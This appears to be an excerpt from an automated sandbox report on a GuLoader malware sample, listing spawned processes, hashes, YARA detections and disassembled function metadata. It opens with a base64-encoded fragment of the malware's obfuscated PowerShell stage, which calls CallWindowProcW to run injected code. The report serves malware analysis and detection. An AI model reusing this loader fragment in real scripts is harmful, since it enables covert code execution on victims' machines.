MASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA=
Imagebase:	0xf70000
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.16379281085.00000000098B0000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: csc.exe PID: 7744 Parent PID: 2692

General

Start time:	11:27:26
Start date:	25/11/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
Imagebase:	0xdd0000
File size:	2141552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cvtres.exe PID: 7396 Parent PID: 7744

General

Start time:	11:27:27
Start date:	25/11/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34E6.tmp" "c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP"
Imagebase:	0x9b0000
File size:	46832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exe PID: 6980 Parent PID: 7972

General

Start time:	11:27:42
Start date:	25/11/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline
Imagebase:	0xdd0000
File size:	2141552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cvtres.exe PID: 6744 Parent PID: 6980

General

Start time:	11:27:43
Start date:	25/11/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES728B.tmp" "c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP"
Imagebase:	0x9b0000
File size:	46832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: ieinstal.exe PID: 3424 Parent PID: 2692

General

Start time:	11:27:51
Start date:	25/11/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\internet explorer\ieinstal.exe
Imagebase:	0xca0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000013.00000002.16194415539.0000000002D20000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000013.00000000.15958445085.0000000002D20000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: ieinstal.exe PID: 1580 Parent PID: 7972

General

Start time:	11:28:06
Start date:	25/11/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\internet explorer\ieinstal.exe
Imagebase:	0xca0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000000.16108270980.0000000003000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000002.16334182427.0000000003000000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: powershell.exe PID: 6584 Parent PID: 5176 powershell.exeCOMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5%
Total number of Nodes:	221
Total number of Limit Nodes:	10

Executed Functions

Function 08264A90, Relevance: 8.0, Strings: 6, Instructions: 512
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`J, xrefs: 08265186
`J, xrefs: 08265092
`J, xrefs: 082650A9
`J, xrefs: 0826516F
`J, xrefs: 0826507B
`J, xrefs: 08265158

Memory Dump Source

Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8260000_powershell.jbxd

Similarity

API ID:
String ID: `J$`J$`J$`J$`J$`J
API String ID: 0-2726738753
Opcode ID: 20562747afa4a20fbc0fe87986a543a2ad4068f03ef8cee85df09fa0a006f8e0
Instruction ID: 67c6658954d67b64fa941a528ebe663ac7bd92d489ff549026d2bf2da11ac3fb
Opcode Fuzzy Hash: 20562747afa4a20fbc0fe87986a543a2ad4068f03ef8cee85df09fa0a006f8e0
Instruction Fuzzy Hash: 4B129E307102099FCB14EF64D455BAEBBE6EF84305F148968E842AB3A5DF34ED46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0842C6E0, Relevance: 5.3, Strings: 4, Instructions: 319
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`J, xrefs: 0842C913
`J, xrefs: 0842C948
`J, xrefs: 0842C9B4
`J, xrefs: 0842C97E

Memory Dump Source

Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8420000_powershell.jbxd

Similarity

API ID:
String ID: `J$`J$`J$`J
API String ID: 0-2501499896
Opcode ID: d2780ec662eee84364cec3f9808896c2c3484ef7ac3b963bd41626433efd3381
Instruction ID: ae4b9cf08164952c52acd64304e84081b235d807fb4cd94f61bd7ef89f595de2
Opcode Fuzzy Hash: d2780ec662eee84364cec3f9808896c2c3484ef7ac3b963bd41626433efd3381
Instruction Fuzzy Hash: 72C1AD70B04215DFCB059FA4C895BAE7BBAFF88305F14842DE9029B391DB799D42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 08498E68, Relevance: 4.3, Strings: 3, Instructions: 520
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^Gl, xrefs: 08499149
^Gl, xrefs: 0849923E
^Gl, xrefs: 08499092

Memory Dump Source

Source File: 00000003.00000002.15285845549.0000000008490000.00000040.00000010.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8490000_powershell.jbxd

Similarity

API ID:
String ID: ^Gl$^Gl$^Gl
API String ID: 0-1549560346
Opcode ID: a68561b345a8e92301e71b43576bfe8fb5a9736cb0b42d5a06672e663a5f8bb1
Instruction ID: 8146c7cb9ba4f8a76653ffed63ecc1cb26c36ef9c51043ed201a3e74547e9027
Opcode Fuzzy Hash: a68561b345a8e92301e71b43576bfe8fb5a9736cb0b42d5a06672e663a5f8bb1
Instruction Fuzzy Hash: B202DD70B002009FDB259B75D855BAEBFF2EF89311F14886EE456DB391CB359806CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04898FC0, Relevance: 4.2, Strings: 2, Instructions: 1711
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fum, xrefs: 0489AED2
fum, xrefs: 0489AF82

Memory Dump Source

Source File: 00000003.00000002.15259086599.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4890000_powershell.jbxd

Similarity

API ID:
String ID: fum$ fum
API String ID: 0-3240418567
Opcode ID: 248cad0b945c6f27526353a05537b2d58f8ca7d325fe4f23a51ca217e9db267c
Instruction ID: 770d988f6f1af57acee25fa32834a2a6e93a2f8a60a19ba4c8901d5af2eafe5e
Opcode Fuzzy Hash: 248cad0b945c6f27526353a05537b2d58f8ca7d325fe4f23a51ca217e9db267c
Instruction Fuzzy Hash: 48034C34A102188FDB55DB60D851BEE7BB3FB88309F1084A8E9496B394CF36AD85DF51

Uniqueness

Uniqueness Score: -1.00%

Function 04899018, Relevance: 4.2, Strings: 2, Instructions: 1694
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fum, xrefs: 0489AED2
fum, xrefs: 0489AF82

Memory Dump Source

Source File: 00000003.00000002.15259086599.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4890000_powershell.jbxd

Similarity

API ID:
String ID: fum$ fum
API String ID: 0-3240418567
Opcode ID: 32c20409f4824fe63658ecdee4fcfe2c48bc2ff86b9d8ae24e820fc3b990f2ed
Instruction ID: e73f88b630c53ac198e06061ff175e35358b44f25486112f80cfc45478ee76dc
Opcode Fuzzy Hash: 32c20409f4824fe63658ecdee4fcfe2c48bc2ff86b9d8ae24e820fc3b990f2ed
Instruction Fuzzy Hash: 04033B34A102188FDB55DB60D851BEE7BB3FB88309F1084A8E9496B394CF36AD85DF51

Uniqueness

Uniqueness Score: -1.00%

Function 04899028, Relevance: 4.2, Strings: 2, Instructions: 1689COMMON

Download Yara Rule

Strings

fum, xrefs: 0489AED2
fum, xrefs: 0489AF82

Memory Dump Source

Source File: 00000003.00000002.15259086599.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4890000_powershell.jbxd

Similarity

API ID:
String ID: fum$ fum
API String ID: 0-3240418567
Opcode ID: 998eace0e12a76d6c79a4be30fe13d29650525b635824971d426352e7ac67dd1
Instruction ID: bf987401d41d8e9b78a4ca182cdedff4b83c24d69677fd6b9aebd0ce77c76e9f
Opcode Fuzzy Hash: 998eace0e12a76d6c79a4be30fe13d29650525b635824971d426352e7ac67dd1
Instruction Fuzzy Hash: D7033B34A102188FDB55DB60D851BEE7BB3FB88309F1084A8E9496B394CF36AD85DF51

Uniqueness

Uniqueness Score: -1.00%

Function 08480448, Relevance: 4.1, Strings: 3, Instructions: 384COMMON

Download Yara Rule

Strings

`J, xrefs: 0848050D
^Gl, xrefs: 084806F9
^Gl, xrefs: 08480816

Memory Dump Source

Source File: 00000003.00000002.15285679449.0000000008480000.00000040.00000010.sdmp, Offset: 08480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8480000_powershell.jbxd

Similarity

API ID:
String ID: ^Gl$^Gl$`J
API String ID: 0-2267862545
Opcode ID: 3ac4d56378e74ff7e2883ef5cf890be9a2b7da6d05922040bce5092bdfba198e
Instruction ID: 7a6203e57893bf375d2ea46e274d4a75b5ac8b3a15fdad6b0dae1c00e5289ad0
Opcode Fuzzy Hash: 3ac4d56378e74ff7e2883ef5cf890be9a2b7da6d05922040bce5092bdfba198e
Instruction Fuzzy Hash: 83E16B74B10604CFCB04EB78D898AADBBF6EF88315B15856AE5069B361DB35EC05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 082646A0, Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

`J, xrefs: 08264A62
(tm, xrefs: 08264A51

Memory Dump Source

Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8260000_powershell.jbxd

Similarity

API ID:
String ID: (tm$`J
API String ID: 0-1344084950
Opcode ID: 37aec6679b8b5352065c2a2c280eb3e27ab09c3ba9d7f3c477bad9f77706e432
Instruction ID: 24aae0e7216450b79ff06d7ef7b8d013d0e77e6f8ac38c08a42f20d94eb1c9f6
Opcode Fuzzy Hash: 37aec6679b8b5352065c2a2c280eb3e27ab09c3ba9d7f3c477bad9f77706e432
Instruction Fuzzy Hash: A0B19B71E1061ADFCB14DF64C8506DEF7F2BF89315F1085A9D909AB250EB70AD8ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 0849A5F1, Relevance: 2.0, Instructions: 2021COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.15285845549.0000000008490000.00000040.00000010.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8490000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6409bd8185b0304661b7bb42e3b76b19c5cf96212aa24a05d6c28e744417a3
Instruction ID: 659f30322b82ff9d9cc6508aa193bfa48d1c05da7b17e15663df480968edef33
Opcode Fuzzy Hash: 5b6409bd8185b0304661b7bb42e3b76b19c5cf96212aa24a05d6c28e744417a3
Instruction Fuzzy Hash: 55032C34B01314DFEB69AF308C157AD76B2AB85705F2085BDE50A9A3D4DF7A9A81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0849248C, Relevance: 1.7, Strings: 1, Instructions: 439COMMON

Download Yara Rule

Strings

^Gl, xrefs: 0849261F

Memory Dump Source

Source File: 00000003.00000002.15285845549.0000000008490000.00000040.00000010.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8490000_powershell.jbxd

Similarity

API ID:
String ID: ^Gl
API String ID: 0-1583963924
Opcode ID: 86ea76ab8aa7644c451856c45136e9f2254b749638a08b616b06f8e4e33f9d8f
Instruction ID: c5bf2a05fa3576fdee407ba97881e90fb0d6f53c5c8c712812b4ac87276eb6d3
Opcode Fuzzy Hash: 86ea76ab8aa7644c451856c45136e9f2254b749638a08b616b06f8e4e33f9d8f
Instruction Fuzzy Hash: 13029D2060A7C95BCB56CB3CD49815AFFA19F82234B6D99EEC1CC8F543CA269847C747

Uniqueness

Uniqueness Score: -1.00%

Function 083C54A4, Relevance: 1.6, APIs: 1, Instructions: 128pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 083C5D88

Memory Dump Source

Source File: 00000003.00000002.15284169334.00000000083C0000.00000040.00000001.sdmp, Offset: 083C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_83c0000_powershell.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: 31153a43395b99a3f56f8f22744d8e0c7568c25dea476a0682421652578938b7
Instruction ID: d8efc14741be3b407b460a7312550c111f07c40ec0c83ec47da6acb54989f979
Opcode Fuzzy Hash: 31153a43395b99a3f56f8f22744d8e0c7568c25dea476a0682421652578938b7
Instruction Fuzzy Hash: DE51E371D013489FDB14CFA9D988B9EBBF6BF88314F25852AE408AB250D7B4A940CF51

Uniqueness

Uniqueness Score: -1.00%

Function 083C7310, Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.15284169334.00000000083C0000.00000040.00000001.sdmp, Offset: 083C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_83c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e8df2c603fff76e6b25219ee3f6a7706aa681f0ad76e4033e00c94b6ec9d22b
Instruction ID: e6f28323fd1f72737f907f63f287756c5667109328e47facc86792521eecee93
Opcode Fuzzy Hash: 9e8df2c603fff76e6b25219ee3f6a7706aa681f0ad76e4033e00c94b6ec9d22b
Instruction Fuzzy Hash: 6642C130A00215DFEB159B64C850BEDB7B6EF89304F1085AAE8497B395DF71AD81CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 08261CC7, Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7e51e7acba6148fa8277758fd935f36d51d80f2042ea4b11cd12a3c4fcca76c
Instruction ID: 404cddb814fbdaefecfd66ba579d4bd331553ab5d96b39e5508a1565a6f6b1de
Opcode Fuzzy Hash: d7e51e7acba6148fa8277758fd935f36d51d80f2042ea4b11cd12a3c4fcca76c
Instruction Fuzzy Hash: DC227F34B10205DFDB04DBB5C890AAEBBB6EF88355F118069E902EB395DB75EC52CB50

Uniqueness

Uniqueness Score: -1.00%

Function 08263050, Relevance: .4, Instructions: 441COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab6b597465ceb9291900419425e6795ccf3db3fc0cf006ca58dfa6b42f36e22b
Instruction ID: c1e40d8bdaf82c6cd279b50113d078187087ae253837818062490e2d6103c972
Opcode Fuzzy Hash: ab6b597465ceb9291900419425e6795ccf3db3fc0cf006ca58dfa6b42f36e22b
Instruction Fuzzy Hash: E5F19D30B10206DBDF19DF65C8886AE77B2FF84316F50856DD901AB395EB75E892CB80

Uniqueness

Uniqueness Score: -1.00%

Function 083C7300, Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.15284169334.00000000083C0000.00000040.00000001.sdmp, Offset: 083C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_83c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 933f05f4765c52d21c693a5f19969da5ed6f92205c8c5f149e0ce5d4b895d46b
Instruction ID: fe6aaebd0f9c861d53f416836cc713cee979105a3f0a21a314ea60381b119510
Opcode Fuzzy Hash: 933f05f4765c52d21c693a5f19969da5ed6f92205c8c5f149e0ce5d4b895d46b
Instruction Fuzzy Hash: B6E1D330A002159FEB15AB74C850BEDB7B6EF89304F1085AAE4097B395DF71AD85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 08420040, Relevance: 5.5, Strings: 4, Instructions: 515
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`J, xrefs: 08420520
`J, xrefs: 084205FF
`J, xrefs: 0842054D
`J, xrefs: 08420584

Memory Dump Source

Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8420000_powershell.jbxd

Similarity

API ID:
String ID: `J$`J$`J$`J
API String ID: 0-2501499896
Opcode ID: a5fabf5e546e9cf723113f9c4d04d33d1704ce74361d74cc8fc2fb617d58cd46
Instruction ID: 9d00118239ba2670bdea531db2e8e65e0700fb7d9b66c3280b79fad217e154b7
Opcode Fuzzy Hash: a5fabf5e546e9cf723113f9c4d04d33d1704ce74361d74cc8fc2fb617d58cd46
Instruction Fuzzy Hash: 5B227E30B00618DFCB14DFA8D554AAEB7F6EF88705F1044A9E806AB3A1CB75ED45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0842B638, Relevance: 5.2, Strings: 4, Instructions: 244
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`J, xrefs: 0842B755
`J, xrefs: 0842B781
;', xrefs: 0842B700
`J, xrefs: 0842B737

Memory Dump Source

Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8420000_powershell.jbxd

Similarity

API ID:
String ID: `J$`J$`J$;'
API String ID: 0-924501989
Opcode ID: b50ee3df653ee184877343bb08951496ada0893ffeb0ed7aed82b8ecdd182e6f
Instruction ID: 031b83279b6e3b9cebddae30664f7e2255096407a49adc646f7361efa57854ea
Opcode Fuzzy Hash: b50ee3df653ee184877343bb08951496ada0893ffeb0ed7aed82b8ecdd182e6f
Instruction Fuzzy Hash: F4910070A04319DBCB15DFA5C8147AEBBF6EF84315F14882EE806AB390DF749D468B90

Uniqueness

Uniqueness Score: -1.00%

Function 08426038, Relevance: 3.9, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

^Gl, xrefs: 08426173
cpm, xrefs: 084260B8
4'pm, xrefs: 084260EF

Memory Dump Source

Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8420000_powershell.jbxd

Similarity

API ID:
String ID: 4'pm$^Gl$cpm
API String ID: 0-278567801
Opcode ID: afb64ee4b9121975b6bfa93280d5a08c45515c98f34512a6a79a0ad95a145102
Instruction ID: 0e20aef779e92bf20fefc0f1e2f16ebd169cca2e853f444b2bbcbd5dcf88cc09
Opcode Fuzzy Hash: afb64ee4b9121975b6bfa93280d5a08c45515c98f34512a6a79a0ad95a145102
Instruction Fuzzy Hash: 9741E4317042104FD708AB7899A4BBE36D68FCA715F1645BAE50ACF3A1DE25CC0687A2

Uniqueness

Uniqueness Score: -1.00%

Function 0826C6F8, Relevance: 3.0, Strings: 2, Instructions: 532COMMON

Download Yara Rule

Strings

`J, xrefs: 0826CD73
`J, xrefs: 0826CD91

Memory Dump Source

Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8260000_powershell.jbxd

Similarity

API ID:
String ID: `J$`J
API String ID: 0-2628089347
Opcode ID: bcc29b5342cc6b940e74c09afd18fbd0d876dd414967d39e11d8d8f8181ed34c
Instruction ID: 3a16d7cc938fbf7f8ed150e1d823660bef939e9b286e130239aeaa2ee7fe3a2d
Opcode Fuzzy Hash: bcc29b5342cc6b940e74c09afd18fbd0d876dd414967d39e11d8d8f8181ed34c
Instruction Fuzzy Hash: 1E227F30A20219DFCB14EF64D444AADBBF2BF88325F11456CD846AB360DB75ED85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 082635C8, Relevance: 2.9, Strings: 2, Instructions: 417COMMON

Download Yara Rule

Strings

`Qpm, xrefs: 08263648
`J, xrefs: 082645B5

Memory Dump Source

Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8260000_powershell.jbxd

Similarity

API ID:
String ID: `J$`Qpm
API String ID: 0-762164195
Opcode ID: 990dd606ea40a56d5f60ad5ba7f64252783b826acc12a79857058ba5378760da
Instruction ID: d54f5221960218c2ed96a8952ea8fb6e415f290af303197d1835e37f6c850e3b
Opcode Fuzzy Hash: 990dd606ea40a56d5f60ad5ba7f64252783b826acc12a79857058ba5378760da
Instruction Fuzzy Hash: FE122574A11219DFDB64DF64C998BADBBB1BF48315F0085A9E90AA73A0DB309DC1CF50

Uniqueness

Uniqueness Score: -1.00%

Function 08427260, Relevance: 2.8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

Strings

(tm, xrefs: 08427543
(tm, xrefs: 08427517

Memory Dump Source

Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8420000_powershell.jbxd

Similarity

API ID:
String ID: (tm$(tm
API String ID: 0-127711166
Opcode ID: cf84abffa61837084c8695a392535560bd632f0f3ef5500120bd0d87ce7a665c
Instruction ID: ecb33d4bf5e5359a89b58f4da3181f271da4edb322d19a188fafce41d39f04b4
Opcode Fuzzy Hash: cf84abffa61837084c8695a392535560bd632f0f3ef5500120bd0d87ce7a665c
Instruction Fuzzy Hash: 06A1C070A04615CFCB14CFA8C884AAEBBF6EF89315B54866ED515DB391DB34EC06CB90

Uniqueness

Uniqueness Score: -1.00%

Function 08428790, Relevance: 2.8, Strings: 2, Instructions: 257COMMON

Download Yara Rule

Strings

pyf^, xrefs: 084288D6
LRpm, xrefs: 084289A7

Memory Dump Source

Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8420000_powershell.jbxd

Similarity

API ID:
String ID: LRpm$pyf^
API String ID: 0-3246084565
Opcode ID: 90eeef5a9ffe4aa51afc123bf9cd6a18f0270717d8e4431b3315fece26328e7b
Instruction ID: 8d8862a7e91332c19b252b6788c7a551f1b2da3785723b4c75865d335fb33f21
Opcode Fuzzy Hash: 90eeef5a9ffe4aa51afc123bf9cd6a18f0270717d8e4431b3315fece26328e7b
Instruction Fuzzy Hash: 9AA12570A04214CFCB18DF68D454AAEBBB6FF89316B54846DE8069B3A1DF35ED46CB40

Uniqueness

Uniqueness Score: -1.00%

Function 08429678, Relevance: 2.8, Strings: 2, Instructions: 255COMMON

Download Yara Rule

Strings

`J, xrefs: 0842990A
`J, xrefs: 0842993C

Memory Dump Source

Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8420000_powershell.jbxd

Similarity

API ID:
String ID: `J$`J
API String ID: 0-2628089347
Opcode ID: c896737031d4bdd38cb2441b94ecb65fb499da3fa4abcfcfa279efd15c779081
Instruction ID: bcd7b476b69f483eb62930038095d00ccf030138b4bf17dba16db9c8eaeb8a60
Opcode Fuzzy Hash: c896737031d4bdd38cb2441b94ecb65fb499da3fa4abcfcfa279efd15c779081
Instruction Fuzzy Hash: A5A17C34A002188FCB14DFB8D454AAEBBF6FF89311F148569D806AB351DB349D46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0842B9B8, Relevance: 2.7, Strings: 2, Instructions: 175COMMON

Download Yara Rule

Strings

`J, xrefs: 0842BA97
`J, xrefs: 0842BA79

Memory Dump Source

Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8420000_powershell.jbxd

Similarity

API ID:
String ID: `J$`J
API String ID: 0-2628089347
Opcode ID: c4e869f6567fa22d361416d96170f19cf6af18c8b073141015f5a7939157fd14
Instruction ID: a1eab830c312c894c1632a42569775e0b63156473dcf96cd5b1abd6e48cd9b39
Opcode Fuzzy Hash: c4e869f6567fa22d361416d96170f19cf6af18c8b073141015f5a7939157fd14
Instruction Fuzzy Hash: 7C51EF70E08359DFCB15DFB4C8145EEBFB5EF86221F14856AE801EB381DB7499068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 083C5C5C, Relevance: 1.6, APIs: 1, Instructions: 133pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 083C5D88

Memory Dump Source

Source File: 00000003.00000002.15284169334.00000000083C0000.00000040.00000001.sdmp, Offset: 083C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_83c0000_powershell.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
